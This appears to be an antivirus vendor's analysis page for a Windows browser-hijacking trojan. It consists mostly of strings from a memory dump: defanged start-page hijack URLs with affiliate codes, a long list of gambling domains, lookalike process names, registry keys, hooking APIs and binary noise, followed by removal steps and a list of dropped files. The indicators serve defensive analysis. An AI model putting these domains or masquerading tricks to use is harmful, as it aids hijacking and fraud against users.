VVV.5334.com
42.62.30.180/
dwz.cn/OXHad
web.sogou.com/?
VVV.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
cn.hao123.com/?tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?src=
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
//index.woai310.com/index.htm?
VVV.sogou58.com/31077
VVV.tao123.com
VVV.dh18.com
456.huo99.com
huo99.com
hao123.cdsoso.net
VVV.2345.com
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
wb.soso.com/?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.mhkfc.net
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.2345.com/?
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\dnsset
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\ZWebNds
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\stans
wxpro.dll
Busiwork.dll
swaddresbar.dll
loguser.dll
WxVSafe.dll
lolhelper.dll
wxcore.dll
rmserver.exe
exploren.exe
services.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
conhost.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
ADMon.exe
Chrom.exe
csrss.exe
hXXps://123.sogou.com/?71163-0897
71163-0897
qiangui666.com
yuebet188.com
hao555666.com
pp88086.com
ay159.com
860923.top
85850z.com
VVV.665252.com
nbboard.com
heshangmeng.net
s88ab.com
qy8100.com
VVV.bb868.com
VVV.bo7727.com
2130.qg790.com
bwin2020.com
vic76.com
jiuwuzhizun11.com
95zz00.com
jwzzgw4.cc
882828.net
jjxieqiaoxx.com
9599333.com
VVV.565.net
yuefabo.com
ylg6266.com
VVV.mf9999.com
VVV.yh478.net
29salon.com
VVV.478001.com
478vip.com
VVV.48111.com
my63303.com
VVV.88928.com
VVV.21222.com
bogou888.com
VVV.31999.com
tycjt1.com
long772.com
VVV.63365.com
VVV.656995.com
VVV.3505.com
VVV.2138s.com
jin3388.com
xam31999.com
ty1299.com
VVV.145a.com
www-57365.com
VVV.880ms.com
555050.com
ylg2299.com
886868.net
59bo.cc
dh5524.com
95996666.net
VVV.0008.com
xinyu588.com
VVV.8-88d.com
9000402.com
moca777.com
VVV.itb88.com
yo86567.com
111f11.com
www-23456.com
jwzzgw.cc
jiuwuzhizun11.cc
tbbet8888.com
VVV.zr88a.cc
aygj77.com
VVV.s138x.com
js00697.com
qwe654.com
VVV.aygj5.com
aoyayule.com
VVV.ay741.com
yo84756.com
haomatang.com
2221402.com
vns255.com
VVV.x6168.com
shangshangchuanmei.com
k178.vcevv.cn
weebly.com
gdzfcn.com
tbfastfast888.com
ty443.com
js9980.com
VVV.shhbm.com
wns707.com
VVV.7999.cc
ylg2099.com
86666.8994.com
aoya113.com
fa97463.com
VVV.ay951.com
VVV.farmer.com.cn
score.365rich.cn
VVV.8ff77.com
0316ga.com
600.cc
VVV.88jt.net
dafabet.com
VVV.ccav5.com
arsenal.com.cn
VVV.2246.com
88jt88.com
28365365.com
VVV.7m.cn
VVV.9599qq.com
VVV.9599aa.com
VVV.yl8886.com
bwin0055.com
yzc178.com
VVV.ca88.com
wofacai.com
jiuwuzhizun6.cc
uu11.cc
1p111.com
jwzzgw2.com
VVV.88jt.cc
95zz44.com
df011.com
95990777.net
anyaoying.com
2p222.com
95zz88.com
dafa888.asia
jiuwuzhizun6.com
95zz08.com
517888.net
95992828.cc
VVV.jxhu.com
VVV.cmp8.com
VVV.9178b.com
bbs.long8.cc
VVV.b1888.cc
95992828.net
biz5.sandai.net
VVV.tycyyy.com
ylg8838.com
yzc363.com
chunv55.com
VVV.9177b.com
yusheedu.com
dafa888.com
VVV.hllzsxa.com
dy7777.com
VVV.6625ss.com
xiudu868.com
95995858.cc
95998888.cc
xin1946.com
qiangui678.com
jwzzgw6.com
95zz11.com
885858.cc
yz188.com
VVV.hfyj.net
VVV.91ent.com
ad.148021.com
yzc262.com
95993838.cc
VVV.ca881.com
5555.ht
VVV.58js.com
VVV.aobo8.net
VVV.b138.cc
VVV.cr1118.com
VVV.df888.com
VVV.dfbet.com
VVV.dfbet.net
VVV.y8.cc
VVV.y9.cc
VVV.yxlm.cc
VVV.tyc.com
VVV.vn66.com
VVV.w88.com
VVV.wofacai.com
hgbet222.com
VVV.m99.com
VVV.mg.cc
dafa888.cm
gcgc915.com
hailifang.com
hg0088.com.so
hg0088.net
hga8800.com
hgw025.com
jsc9988.com
s8s.cc
5060001.com
2055aaa.com
VVV.m402.com
VVV.660022.com
95990044.cc
1bet999.com
ad.050122.com
88jt03.com
VVV.9599gg.com
1006163.com
VVV.df011.com
dy8811.com
px0311.com
9911tyc.com
ty442.com
amws1199.com
yrmt168.com
jwzzgw6.cc
0006163.com
VVV.ay017.com
88jt33.net
zuijiabo.com
VVV.y9.tt
95993838.net
VVV.s138y.com
dafa91.cn
tongbo8888.com
51taotaoyou.com
VVV.ll-49.com
vip1922.com
050ab29.com
9882011.com
w88wap.com
63bdg.com
47.89.30.97
5345yy.com
yzc1188.com
VVV.111146.com
9927qqq.com
b365444.com
aygj587.com
hb3333.com
ddh111.com
9599qq.com
ji586987.com
VVV.tycjt1.com
95993333.cc
milan86.com
ylg9099.com
yl882288.com
yinhemmm.com
blm0000.com
VVV.bmw7.com
VVV.ca151.com
ad.517dapai.com
59bo.com
VVV.b22138.com
VVV.4662.com
VVV.23456.com
VVV.f402.com
VVV.anhui365.net
ylg9999.com
newbet6.com
VVV.mg123.cm
tlc187.com
VVV.sdw11.com
dhy0022.com
991991.cc
VVV.mr007.com
yo56378.com
fa74955.com
{844D7191-2FEF-4d2b-AB06-718517B0BFC5}
{684EF56E-2FAE-4ed2-BF46-F0440C5BE24F}
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
winlogon.exe
TMyIdTCPServerEventCall
TMyIdUDPServerEventCallU
NTDLL.DLL
$%X,$%X; $%X,$%X; %d KB
.hao123.com
2345.5636lm.com
VVV.baidu.com/
$%X,$%X; $%X,$%X;
123.sogou.com
123abc.dll
TMyCheckOpenUrl
TDRIVER_UrlWatchList
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
play.bat
hXXps://123.sogou.com/?71156-5497
b~~z0%%}}}$cz;92$ieg%czy;922$kyz
b~~z0%%cz$ik~x$id%
<2> 2222,
<2> 1111,
b~~z0%%cz$ndyorc~$ieg%
pWin7Server.exe
KERNEL32.DLL
360Chrome\Chrome\
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
SetRegKey Error:
*.lnk
*.url
%d.%d.%d.%d
fash.exe
txupd.exe
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
G.uNn.
43210/.-, *)('&%$#"!
x%u]1
*?.Uk='
p0@%c
TC"-c}
L.YC~
r%s^,
E[.Pg
L)%.F
,.WMuU`
V.KS7
aF.IU}1
E2.ySz
%6XOi
EM;.Qj
m.tkT
.wtf6
C.PU7
i%dUFm
1%Uvb
V9CRT
2'l.tDg
v.EUH
6.CZg_
@6IEXe
.Ja,<3A
?456789:;<=
!"#$%&'()* ,-./0123
%WinDir%\CLOG.txt
2016-09-22
21:37:18
21:37:15
21:37:16
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegSetKeySecurity
RegQueryInfoKeyA
RegNotifyChangeKeyValue
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetProcessHandleCount
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
IdTCPStream
 IdTCPServer
UrlMon
MyHTTPSProxyRF
0IdHTTPHeaderInfo
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(/
( ,''.-!$$$&'(/*) ,*/.)*72-9
, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-,
86\22,-!'
PLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Instruction TLB, 4Kb pages, 4-way set associative, 32 entries8Instruction TLB, 4Mb pages, fully associative, 2 entries6Data TLB, 4Kb pages, 4-way set associative, 64 entries5Data TLB, 4Mb pages, 4-way set associative, 8 entries?8KB instruction cache, 4-way set associative, 32 byte line size@16KB instruction cache, 4-way set associative, 32 byte line size78KB data cache 2-way set associative, 32 byte line size916KB data cache, 4-way set associative, 32 byte line size
No help keyword specified.
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalid
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
SSL status: "%s"
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
%s is not a valid IP address.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
No command handler found.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

%original file name%.exe_2044_rwx_018D2000_00002000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
version.dll
gdi32.dll
ole32.dll
ntdll.dll
comctl32.dll
shell32.dll
ShellExecuteA
wininet.dll
FindNextUrlCacheEntryA
URLMON.DLL
UrlMkGetSessionOption
wsock32.dll
Rpcrt4.dll
OLEACC.DLL
psapi.dll
%sy5|l

%original file name%.exe_2044_rwx_10001000_00039000:

GetProcessWindowStation
RtlCreateRegistryKey
zcÁ
.bS[9
P.fX[9
.pZ[9q
.fJ[9
.Vg-Q
.TV[9!
.FV[9
.rV[9
\.Dd[9
.zQ[9}W
.XR[9
.lQ[9D
.NT[9
W[.jR[9N H&!/m<
.wG[9
.Ou[9
.gJ[9
! -d.pN[9
.Mt[9
n\.cm[9
W[.UB[9
.gf[9
W[.Pz[9
.vI[9
l.Eu[9Ho
O-.qF
c:\%original file name%.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\DosDevices\%s
\Registry\Machine\System\CurrentControlSet\Services\%s
\??\%s
%s\%s
kernel32.dll
W%s\%x
ntdll.dll
\\.\%s
%s.bak
\\.\9P00FgsFjdc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %WinDir%\JoYJKb\obTCfBhEA.dll (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jscript_jquery-1.4.2.min[1].js (2740 bytes)
    %WinDir%\JoYJKb\498E9.dat (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\175sf[1].htm (4364 bytes)
    %WinDir%\CLOG.txt (5129 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
    %WinDir%\JoYJKb\NDTmWEYYA.tmp (12 bytes)
    %System%\128b12\CDClient_EX.sys (125 bytes)
    %WinDir%\JoYJKb\DbHnhAd.dll (12780 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\style[1].css (17 bytes)
    %WinDir%\KXQgMV.dll (11 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
